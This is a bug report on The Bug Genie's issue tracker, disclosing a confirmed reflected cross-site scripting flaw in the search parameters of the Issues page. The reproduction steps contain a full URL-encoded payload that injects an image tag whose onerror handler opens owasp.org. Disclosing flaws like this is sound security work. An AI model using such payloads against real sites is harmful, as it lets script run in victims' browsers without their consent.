Please log in to bookmark issues
#2890 –
Confirmed
Description
Attackers can execute malicious scripts on other users' computers. They can do this by entering JavaScript code in different URL parameters such as “fs[project_id][o]”, “fs[project_id][v]”, “fs[issuetype][o]”,etc. on the “search” functionality, which belongs to the “Issues” page. The malicious user would have to lure the victim to follow a link in order to have the attack executed on the victim's computer.
How to reproduce
- Log in to https://issues.thebuggenie.com
- At the address bar, type the following URL: https://issues.thebuggenie.com/issues?%20fs[project_id][o]=%3d%22%3E%3Cimg%20src=%22xss%22%20onerror=%22window.open(%27https://owasp.org%27)%20%22%3E&fs[project_id][v]=&fs[issuetype][o]=%3D&fs[issuetype][v]=&fs[status][o]=%20%3D&fs[status][v]=&fs[category][o]=%3D&fs[category][v]=&sortfields=%20issues.last_updated%3Ddesc&fs[text][o]=%3D&fs[text][v]=error%20handling&%20scs_current_template=&template=results_normal&template_parameter=&%20grouporder=asc&groupby=&issues_per_page=50
- press the Enter key.
- As you can see, the injected script is executed.
Attachments0
Important details
Times and dates
-
Estimated time No time estimated
People involved
Other details
-
-
-
Not determined
Post a comment and get things done